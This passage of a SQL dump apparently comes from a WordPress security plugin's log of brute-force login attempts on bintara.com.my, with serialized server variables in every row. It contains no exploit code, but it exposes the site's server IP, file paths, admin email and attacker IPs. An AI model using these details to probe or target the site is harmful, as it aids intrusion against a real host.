03:33:05',17741144,19232600,'https://bintara.com.my/wp-login.php',1,0,'163.172.105.169'),(24877,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.169\";s:11:\"REMOTE_PORT\";s:5:\"47898\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGldCqbKGlf1IVly7OXMgAAAU4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568777588.2861\";s:12:\"REQUEST_TIME\";s:10:\"1568777588\";}}','notice','2019-09-18 03:33:10','2019-09-18 03:33:08',18259568,19560016,'https://bintara.com.my/xmlrpc.php',1,0,'163.172.105.169'),(24878,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"64.19.194.202\";s:11:\"REMOTE_PORT\";s:5:\"49148\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGmym4SfF9g@8lNlxwtqgAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568777930.2804\";s:12:\"REQUEST_TIME\";s:10:\"1568777930\";}}','notice','2019-09-18 03:38:51','2019-09-18 03:38:50',17741976,19233776,'https://bintara.com.my/wp-login.php',1,0,'64.19.194.202'),(24879,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"64.19.194.202\";s:11:\"REMOTE_PORT\";s:5:\"49926\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGmzEQGijxhVPhG1M0PAgAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568777933.0483\";s:12:\"REQUEST_TIME\";s:10:\"1568777933\";}}','notice','2019-09-18 03:38:54','2019-09-18 03:38:53',18259152,19558448,'https://bintara.com.my/xmlrpc.php',1,0,'64.19.194.202'),(24880,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.181.139\";s:11:\"REMOTE_PORT\";s:5:\"49536\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGoWiR0vdvYEIduPCLYhgAAAQk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568778330.5291\";s:12:\"REQUEST_TIME\";s:10:\"1568778330\";}}','notice','2019-09-18 03:45:31','2019-09-18 03:45:30',17741144,19232600,'https://bintara.com.my/wp-login.php',1,0,'188.166.181.139'),(24881,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.181.139\";s:11:\"REMOTE_PORT\";s:5:\"49817\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGoXK1FqYKvioG46Y4abgAAAIo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568778332.6689\";s:12:\"REQUEST_TIME\";s:10:\"1568778332\";}}','notice','2019-09-18 03:45:34','2019-09-18 03:45:33',18259568,19560016,'https://bintara.com.my/xmlrpc.php',1,0,'188.166.181.139'),(24882,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"57804\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGomq1FqYKvioG46Y4ajwAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568778394.1576\";s:12:\"REQUEST_TIME\";s:10:\"1568778394\";}}','notice','2019-09-18 03:46:35','2019-09-18 03:46:34',17741952,19233992,'https://bintara.com.my/wp-login.php',1,0,'31.14.128.73'),(24883,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"58103\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGonUQGijxhVPhG1M0PTwAAAAc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568778397.8185\";s:12:\"REQUEST_TIME\";s:10:\"1568778397\";}}','notice','2019-09-18 03:46:39','2019-09-18 03:46:38',18259272,19554856,'https://bintara.com.my/xmlrpc.php',1,0,'31.14.128.73'),(24884,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"103.7.41.216\";s:11:\"REMOTE_PORT\";s:5:\"39680\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGqmCqbKGlf1IVly7OYsAAAAUo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568778904.8927\";s:12:\"REQUEST_TIME\";s:10:\"1568778904\";}}','notice','2019-09-18 03:55:06','2019-09-18 03:55:05',17742176,19233904,'https://bintara.com.my/wp-login.php',1,0,'103.7.41.216'),(24885,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"103.7.41.216\";s:11:\"REMOTE_PORT\";s:5:\"40554\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGqnyR0vdvYEIduPCLY9wAAAQw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568778911.3342\";s:12:\"REQUEST_TIME\";s:10:\"1568778911\";}}','notice','2019-09-18 03:55:12','2019-09-18 